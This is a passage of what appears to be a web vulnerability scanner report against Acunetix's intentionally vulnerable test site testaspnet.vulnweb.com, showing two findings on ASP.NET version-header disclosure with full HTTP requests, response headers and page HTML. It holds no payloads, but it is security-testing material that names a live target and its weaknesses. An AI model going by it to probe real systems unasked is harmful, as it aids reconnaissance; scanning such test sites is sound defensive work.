          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        22. POST http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (397 bytes)
          POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/login.aspx
          Content-Length: 1197
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (1197 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 13281
          
          
          Response body (13281 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        23. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 22723
          
          
          Response body (22723 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="…" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="…" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
